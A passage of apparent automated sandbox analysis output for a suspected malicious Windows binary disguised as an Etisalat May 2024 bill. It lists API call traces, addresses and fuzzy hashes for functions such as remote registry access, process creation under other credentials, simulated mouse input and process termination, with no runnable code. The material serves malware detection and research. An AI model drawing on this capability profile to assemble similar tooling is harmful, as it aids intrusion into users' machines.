                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: ad18d018114dd0f850de553ec4f3a5f90821881bef30afe4747c45d82c81b964
                                      • Instruction ID: 7103fd3704db77fc7b7d7cd2147b558a6f2f7d3549a27298702f6f253cb8b439
                                      • Opcode Fuzzy Hash: ad18d018114dd0f850de553ec4f3a5f90821881bef30afe4747c45d82c81b964
                                      • Instruction Fuzzy Hash: 4F1182B255021ABFEF159F65CC85EEB7F6DEF08758F014125FA04A6090CB72AC21DBA4
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00B84292,?), ref: 00B841E3
                                      • GetProcAddress.KERNEL32(00000000), ref: 00B841EA
                                      • EncodePointer.KERNEL32(00000000), ref: 00B841F6
                                      • DecodePointer.KERNEL32(00000001,00B84292,?), ref: 00B84213
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 3489934621-340411864
                                      • Opcode ID: 6e09a651bcd0c3d3ad4c2f8650da49c55e6235342e2a71fcbaecb144ccb389f5
                                      • Instruction ID: 664caaad17849d2d22a49726b6ebc748cedfe8a5aa968468ad3baf87876ee546
                                      • Opcode Fuzzy Hash: 6e09a651bcd0c3d3ad4c2f8650da49c55e6235342e2a71fcbaecb144ccb389f5
                                      • Instruction Fuzzy Hash: CEE0EDB85A0346DBDF206FB0EC49B2C3AD4A760B02F504474B511EA4B0DBB544A68F04
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B841B8), ref: 00B842B8
                                      • GetProcAddress.KERNEL32(00000000), ref: 00B842BF
                                      • EncodePointer.KERNEL32(00000000), ref: 00B842CA
                                      • DecodePointer.KERNEL32(00B841B8), ref: 00B842E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 3489934621-2819208100
                                      • Opcode ID: 30116da9358face8cc78c067c49e3a69d8830d0f3f62e009ef291f02b0020c46
                                      • Instruction ID: 8780ddfc261abaac6a3a9268f4466cb508c9ac7d597d1b2bcd0cf11f3eb4d75e
                                      • Opcode Fuzzy Hash: 30116da9358face8cc78c067c49e3a69d8830d0f3f62e009ef291f02b0020c46
                                      • Instruction Fuzzy Hash: 6FE0927C6A5246ABEA24AF60ED49F283AA4BB24742F104168F511EA4B0CBB44555DB18
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove$__itow__swprintf
                                      • String ID:
                                      • API String ID: 3253778849-0
                                      • Opcode ID: 42b24a324091847f88bd39119417456c8445345a43b35406fb951533c7be60ac
                                      • Instruction ID: 5ebee361f179d37e86d86b41e98630ae84e55ab3260256fafcd38abb7486b53b
                                      • Opcode Fuzzy Hash: 42b24a324091847f88bd39119417456c8445345a43b35406fb951533c7be60ac
                                      • Instruction Fuzzy Hash: 92617B3050065A9BCF11EF64CC81FFE37E8EF48308F044599F95A5B1A2DA78AD46CB51
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BE0038,?,?), ref: 00BE10BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BE0548
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BE0588
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BE05AB
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BE05D4
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BE0617
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BE0624
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                      • String ID:
                                      • API String ID: 4046560759-0
                                      • Opcode ID: bd7548cc9b14be3d6c3adeea159cafa9a25d1822f3705531e46fcd333f6bb49d
                                      • Instruction ID: 2a3d0231e00c12d2d4405171924a5fb4c280e7a8bb9507108f32521782eedd36
                                      • Opcode Fuzzy Hash: bd7548cc9b14be3d6c3adeea159cafa9a25d1822f3705531e46fcd333f6bb49d
                                      • Instruction Fuzzy Hash: 37516A31118241AFCB10EF64C885E6FBBE8FF84314F0449ADF5858B2A2DB75E945CB52
                                      APIs
                                      • GetMenu.USER32(?), ref: 00BE5A82
                                      • GetMenuItemCount.USER32(00000000), ref: 00BE5AB9
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BE5AE1
                                      • GetMenuItemID.USER32(?,?), ref: 00BE5B50
                                      • GetSubMenu.USER32(?,?), ref: 00BE5B5E
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BE5BAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: b5a48b960854e196ed55561fa744d04c05a5c56d4812cbcc1c193d37aac40256
                                      • Instruction ID: 8e34c0869a3fc85283795d016caca26b7813c3cc728cf9b7179cdfbb8d2d3d23
                                      • Opcode Fuzzy Hash: b5a48b960854e196ed55561fa744d04c05a5c56d4812cbcc1c193d37aac40256
                                      • Instruction Fuzzy Hash: B7517D31A00615AFCF21EFA5C885AAEB7F4EF48314F1444A9F902BB351CB74AE41CB90
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00BBF3F7
                                      • VariantClear.OLEAUT32(00000013), ref: 00BBF469
                                      • VariantClear.OLEAUT32(00000000), ref: 00BBF4C4
                                      • _memmove.LIBCMT ref: 00BBF4EE
                                      • VariantClear.OLEAUT32(?), ref: 00BBF53B
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BBF569
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                      • String ID:
                                      • API String ID: 1101466143-0
                                      • Opcode ID: bca999e688585bb654c11dc8c5f4212ef7640f0e4ee053d7b83a1e29994e7774
                                      • Instruction ID: 98261ada8ad57ef93aa444198662da0be09ac489687ba24d584e7f927e3e8b82
                                      • Opcode Fuzzy Hash: bca999e688585bb654c11dc8c5f4212ef7640f0e4ee053d7b83a1e29994e7774
                                      • Instruction Fuzzy Hash: 01516AB5A0020AEFCB10CF58D880EAAB7F8FF4C354B1585A9E959DB350D770E911CBA0
                                      APIs
                                      • _memset.LIBCMT ref: 00BC2747
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BC2792
                                      • IsMenu.USER32(00000000), ref: 00BC27B2
                                      • CreatePopupMenu.USER32 ref: 00BC27E6
                                      • GetMenuItemCount.USER32(000000FF), ref: 00BC2844
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00BC2875
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                      • String ID:
                                      • API String ID: 3311875123-0
                                      • Opcode ID: 4a4251e1fa9986b8a8cad80cc7741c131bffc87bd5dd1164cbb9a4d016ed8600
                                      • Instruction ID: d576d512e8ce7a152a55c840d21dcf9c454de5a02b692766096f8f2b3935d114
                                      • Opcode Fuzzy Hash: 4a4251e1fa9986b8a8cad80cc7741c131bffc87bd5dd1164cbb9a4d016ed8600
                                      • Instruction Fuzzy Hash: 5D519D70A0034AEBDF25CF68D988FAEBBF5EF54314F1041ADE8219B291D7709944CB61
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00B6179A
                                      • GetWindowRect.USER32(?,?), ref: 00B617FE
                                      • ScreenToClient.USER32(?,?), ref: 00B6181B
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B6182C
                                      • EndPaint.USER32(?,?), ref: 00B61876
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                      • String ID:
                                      • API String ID: 1827037458-0
                                      • Opcode ID: c249791ff121ae388c215aec558f471dc1590b5b71d4eaca9c9866f719a4bbbe
                                      • Instruction ID: 7e3f0973b86af7821f7717095587124dd5d2109d109a7788418ece327327fe40
                                      • Opcode Fuzzy Hash: c249791ff121ae388c215aec558f471dc1590b5b71d4eaca9c9866f719a4bbbe
                                      • Instruction Fuzzy Hash: 84419F70100341AFDB11DF29D8C4FBA7BE8EB45724F084AA8F5958B2A1CB349845DB61
                                      APIs
                                      • ShowWindow.USER32(00C267B0,00000000,016458D8,?,?,00C267B0,?,00BEB862,?,?), ref: 00BEB9CC
                                      • EnableWindow.USER32(00000000,00000000), ref: 00BEB9F0
                                      • ShowWindow.USER32(00C267B0,00000000,016458D8,?,?,00C267B0,?,00BEB862,?,?), ref: 00BEBA50
                                      • ShowWindow.USER32(00000000,00000004,?,00BEB862,?,?), ref: 00BEBA62
                                      • EnableWindow.USER32(00000000,00000001), ref: 00BEBA86
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00BEBAA9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: c704967284133ee699c4151828b48056785c57b54be3c022eb36841b4e655501
                                      • Instruction ID: 0942bb378da6486755043131db29804c65756455a2e223a4273cf0d519f99759
                                      • Opcode Fuzzy Hash: c704967284133ee699c4151828b48056785c57b54be3c022eb36841b4e655501
                                      • Instruction Fuzzy Hash: 7D413034600281AFDB26CF56C489FA67BE1FF05314F1842F9EA498F6A3CB31A845DB51
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00BD5134,?,?,00000000,00000001), ref: 00BD73BF
                                        • Part of subcall function 00BD3C94: GetWindowRect.USER32(?,?), ref: 00BD3CA7
                                      • GetDesktopWindow.USER32 ref: 00BD73E9
                                      • GetWindowRect.USER32(00000000), ref: 00BD73F0
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BD7422
                                        • Part of subcall function 00BC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC555E
                                      • GetCursorPos.USER32(?), ref: 00BD744E
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BD74AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: d879c4b547ac44936d851c3d71308584a4213fb86b0744402718f062ae9f675a
                                      • Instruction ID: fac254b8fcd5b793dd0978b07506bc2378408569546734fe93b77427ac920a09
                                      • Opcode Fuzzy Hash: d879c4b547ac44936d851c3d71308584a4213fb86b0744402718f062ae9f675a
                                      • Instruction Fuzzy Hash: D9310832508346AFC720DF14C849F9BBBE9FF98314F00091AF48497291DB70EA44CB92
                                      APIs
                                        • Part of subcall function 00BB85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BB8608
                                        • Part of subcall function 00BB85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BB8612
                                        • Part of subcall function 00BB85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BB8621
                                        • Part of subcall function 00BB85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BB8628
                                        • Part of subcall function 00BB85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BB863E
                                      • GetLengthSid.ADVAPI32(?,00000000,00BB8977), ref: 00BB8DAC
                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BB8DB8
                                      • HeapAlloc.KERNEL32(00000000), ref: 00BB8DBF
                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00BB8DD8
                                      • GetProcessHeap.KERNEL32(00000000,00000000,00BB8977), ref: 00BB8DEC
                                      • HeapFree.KERNEL32(00000000), ref: 00BB8DF3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 3008561057-0
                                      • Opcode ID: ecebee923452b6ba1b95f6f3f14387bbed4f4814cee84229289fda965a3c5ce6
                                      • Instruction ID: 95d7a855a5a7f50c447fc0052666b495652c8890c8177b3118e1da193e1827ff
                                      • Opcode Fuzzy Hash: ecebee923452b6ba1b95f6f3f14387bbed4f4814cee84229289fda965a3c5ce6
                                      • Instruction Fuzzy Hash: D1119D31500605EBDF109F64CC49BFE77ADEB55316F1041AEE945A7290CB719900CB60
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00BB8B2A
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00BB8B31
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00BB8B40
                                      • CloseHandle.KERNEL32(00000004), ref: 00BB8B4B
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BB8B7A
                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00BB8B8E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      • Opcode ID: e60c477828cb4a696fcd0d7222925b4d1c95d211d0914485c8143c966c617fed
                                      • Instruction ID: 408ac1367fd90ce71239e303b26526d657ff82940ffac8540f6a9e16e5c9fec9
                                      • Opcode Fuzzy Hash: e60c477828cb4a696fcd0d7222925b4d1c95d211d0914485c8143c966c617fed
                                      • Instruction Fuzzy Hash: F8111DB250124AABDB119FA4ED49FEA7BADEF48304F044065FA04A6160CB769D60DB60
                                      APIs
                                        • Part of subcall function 00B612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B6134D
                                        • Part of subcall function 00B612F3: SelectObject.GDI32(?,00000000), ref: 00B6135C
                                        • Part of subcall function 00B612F3: BeginPath.GDI32(?), ref: 00B61373
                                        • Part of subcall function 00B612F3: SelectObject.GDI32(?,00000000), ref: 00B6139C
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00BEC1C4
                                      • LineTo.GDI32(00000000,00000003,?), ref: 00BEC1D8
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BEC1E6
                                      • LineTo.GDI32(00000000,00000000,?), ref: 00BEC1F6
                                      • EndPath.GDI32(00000000), ref: 00BEC206
                                      • StrokePath.GDI32(00000000), ref: 00BEC216
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: a468c7ff32c611216bb5c059f248a61d5535e738bcc594af6b24760e988d3e00
                                      • Instruction ID: 2d664ac351426bce68f27d23e3af914765649681d7a3fce5b580801043769f8a
                                      • Opcode Fuzzy Hash: a468c7ff32c611216bb5c059f248a61d5535e738bcc594af6b24760e988d3e00
                                      • Instruction Fuzzy Hash: 1A115B7600014DFFDF119F90DC88FAA3FADEF08350F048061BA089A1A2C7719E55DBA0
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B803D3
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B803DB
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B803E6
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B803F1
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B803F9
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B80401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: e5f53e93936ca3c83311960de4f9e6c9d2cdf39948b10cd9ea8ae7ba08e569dc
                                      • Instruction ID: 622691b0f6cd755b73f4578b47d23b116bd65d69cd8906143a9f70433e9f4e94
                                      • Opcode Fuzzy Hash: e5f53e93936ca3c83311960de4f9e6c9d2cdf39948b10cd9ea8ae7ba08e569dc
                                      • Instruction Fuzzy Hash: 74016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BA15C4B941C7F5A864CBE5
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BC569B
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BC56B1
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00BC56C0
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BC56CF
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BC56D9
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BC56E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: cc43d786ad75eb0898b79e43dfe6f00fd9e8c90ba5f1cf4c77a7d1e67ef38806
                                      • Instruction ID: 6372946d12c3d986cc1aa850e6c122c35aea059c5bbd91db17e51b3f52a7ec2d
                                      • Opcode Fuzzy Hash: cc43d786ad75eb0898b79e43dfe6f00fd9e8c90ba5f1cf4c77a7d1e67ef38806
